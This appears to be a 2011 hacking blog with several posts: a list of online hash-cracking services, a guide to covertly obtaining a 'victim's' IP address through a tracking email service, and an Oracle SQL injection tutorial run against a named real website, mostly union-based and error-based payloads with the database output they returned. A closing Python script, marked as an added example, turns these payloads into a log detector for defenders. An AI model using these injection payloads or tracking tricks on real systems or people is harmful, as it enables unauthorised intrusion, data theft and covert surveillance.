Thursday, December 22, 2011

Cracking Hash : List of Web

MD5 Cracker Web List

Just wanna share with you guys a list of websites/services for cracking an MD5 hash.
Check it out. r0x d4 n3tw0rk

- md5gle.com

- online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282)

- md5Crack.com | online md5 cracker

- [ md5 crack password crack hash checker ]

- md5cracker.tk (MD5 search engine that searches a total of 14 online crackers.)

- Index of / (5,889,729)

- AP3 Designs

- http://md5-db.com (The database is approximately 70gb)

- md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235)

- GData: An Online MD5 Hash Database (3,251,106)

- TMTO[dot]ORG (306.000.000.000)

- milw0rm.com - free md5/lm hash cracking (Milw0rm Cracker db)

- BlackLight's hash cracker (2,456,288)

- .:Shell-Storm.org:. | DataBase MD5 | ( The data base currently contains 169582 passwords )

- Parallels Confixx (Need Account)

- Passwords recovery - MD5, SHA1, MySQL (Register to increase your priority)

- md5 online lookup and cracking | md5 decryption | md5 encryption | salt

- Hashkiller.com

- plain-text.info

- insidepro.com

- md5decrypter.co.uk

- c0llision.net

- md5pass.info

- hashcrack.com

- generuj.pl

- authsecu.com

- md5decryption.com

- chwett.com/md5

- md5this.com

- tmto.org

- kerinci.net

- hash.db.hk

- crackfor.me

- md5hood.com

- neofusion.de

- md5.shalla.de

- md5.my-addr.com

- hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash}

- md5.opencracking.info

- md5online.net

- macrosoftware.ro/md5

- netmd5crack.com

- bokehman.com

- hash-database.net

- thoran.eu

- md5-database.net

- web-security-services.com

- bitdelivery.net



-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
www.md5oogle.com
[ md5 crack password crack hash checker ]
milw0rm.com - free md5/lm hash cracking
darkc0de.com [ index ]

-----------------------------------------------------------------
MULTI
-----------------------------------------------------------------
md5cracker.org
md5.igrkio.info
hashkiller.com
hashchecker.de
sinhalayo159.07x.net


-----------------------------------------------------------------
IRC
-----------------------------------------------------------------
plain-text.info (irc.Plain-Text.info #rainbowcrack |||| irc.rizon.net #rainbowcrack)
md5.overclock.ch (irc.rizon.net #md5)
c0llision.net (irc.after-all.org #md5crack |||| ircd.hopto.org #md5crack)



-----------------------------------------------------------------
ICQ
-----------------------------------------------------------------
c0llision.net (427-921-047) <- md5, ntlm
hashkiller.com (405-701-776) <- md5



-----------------------------------------------------------------
LM
-----------------------------------------------------------------
lmcrack.com
plain-text.info


-----------------------------------------------------------------
NTLM
-----------------------------------------------------------------
plain-text.info
md5decrypter.co.uk


-----------------------------------------------------------------
SHA1
-----------------------------------------------------------------
md5.rednoize.com
hash.db.hk
md5decrypter.co.uk


-----------------------------------------------------------------
SHA256
-----------------------------------------------------------------
md5.shalla.de
hash.db.hk


-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
Free Rainbow Tables » Distributed Rainbow Cracking » LM, NTLM, MD5, SHA1, HALFLMCHALL, MSCACHE
Rainbow Tables . net


Sunday, November 27, 2011

Track IP using email

Track IP using email - article originally from Iniseni
This time I will explain how to track an IP address with an advanced method. Using this method you can get the IP address, location and timing of the victim.


How to track an IP address?
Step 1:
Know your victim's email ID.
For example:
victimid[@]gmail.com

Step 2:
Register an account here: http://www.readnotify.com


Step 3:
Send mail to the victim using your readnotify.com mail account. Before sending, append ".readnotify.com" to the end of the victim's mail ID.
For example:
victimid[@]gmail.com.readnotify.com


Step 4:
If the victim opens the mail, his info (IP address) will be tracked and mailed to your account.

Now you get the IP.. he just got pwned by you!! iniseni


Tuesday, November 22, 2011

#./ro0t3r.sh: SQLi Filter bypass WAF

#./ro0t3r.sh: SQLi Filter bypass WAF: This is SQLi evasion filter.. that used to bypass WAF (Web Application Firewall) filter for some string,char,byte,operator and others... ...


Wednesday, November 16, 2011

#./ro0t3r.sh: Hash Type

#./ro0t3r.sh: Hash Type: For you guys as reference. Sharing is caring.. kekeke ES(Unix) IvS7aeT4NzQPM Domain Cached Credentials Admin:b474d48cdfc4974d86e f4d249...

For more, visit #./ro0t3r.sh


Monday, May 30, 2011

Oracle Database Injection


So we're going to play with Oracle Database Injection.
Our target:
http://www3.inn.cl
First, using union-based injection.

1 - We start by checking for the vulnerability by appending a single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
If it is vulnerable, it will return an error:
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
We can see ORA-01756, so we know right away that this is Oracle injection, right?


2 - We find the number of columns as usual: order by 1-- and so on until an error appears.
On this site, the number of columns = 9
3 - So we continue with our union injection
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
If no column number is displayed here, we look at the error it returns.
Quote:
Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

"FROM keyword not found" means that this injection needs a FROM.
For reference:
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Before that, we first need to replace all the column numbers with null, the same as in PostgreSQL injection.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--

To make it easy to find out which column can be injected, change the nulls to 0 one at a time.
In this case, putting 0 in the first null column gives no error, but an error appears for the 2nd column.
This means the second column is the one we can inject.


4 - In this tutorial we only inject and extract as far as version(); the rest you can test yourselves.
From pentestmonkey, we see there are 3 syntaxes for checking the version:
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


So we just take the 1st one for testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production




So.. it worked...
----------------------------------------------------------------------------------------------------------
For error-based injection, we usually use or 1=1 / or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
The function utl_inaddr.get_host_address can only be used if
Oracle is version 10g or below. For 11g we need to use

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6


Credit to : p0pc0rn @tbd.my
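
The request and error patterns from this walkthrough, turned into a log check a defender can run. This is an added example, not part of the original post: the host `app.example`, the function names and the sample lines are constructed, and treating `id` as a numeric-only parameter is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request-side signatures taken from the payload shapes shown in this tutorial.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "oracle-version-view": re.compile(r"\bv\$(version|instance)\b", re.I),
    "error-based-function": re.compile(
        r"\b(utl_inaddr\.get_host_address|ctxsys\.drithsx\.sn)\s*\(", re.I),
}
ORA_ERROR = re.compile(r"\bORA-\d{5}\b")

def inspect_request(url, numeric_params=("id",)):
    """Return the sorted list of findings for one requested URL."""
    findings = set()
    # parse_qsl percent-decodes values, so %27 and + are normalised first.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # Assumption: parameters listed in numeric_params only ever hold integers.
        if name in numeric_params and not re.fullmatch(r"-?\d+", value):
            findings.add("non-numeric-id")
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.add(label)
    return sorted(findings)

def leaked_oracle_errors(body):
    """Return the ORA-nnnnn codes exposed in a response body, in order seen."""
    return list(dict.fromkeys(ORA_ERROR.findall(body)))

# Constructed sample data (hypothetical host and path, not real traffic).
SAMPLE_REQUESTS = [
    "http://app.example/noticias/index.php?id=2372",
    "http://app.example/noticias/index.php?id=2372%27",
    "http://app.example/noticias/index.php?id=2372+order+by+10--",
    "http://app.example/noticias/index.php?id=-2372+UNION+SELECT+null,banner,null"
    "+FROM+v$version--",
    "http://app.example/noticias/index.php?id=2372+or+1=utl_inaddr."
    "get_host_address((SELECT+banner+FROM+v$version))",
]
SAMPLE_BODY = ("Warning: ociparse(): OCIParse: ORA-01756: quoted string not "
               "properly terminated in /path/_index.php on line 5")

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(inspect_request(url), url)
    print(leaked_oracle_errors(SAMPLE_BODY))
```

A hit from `leaked_oracle_errors` means PHP warnings are being rendered to visitors; the root fix on the request side is binding `id` as a parameter instead of concatenating it into the statement.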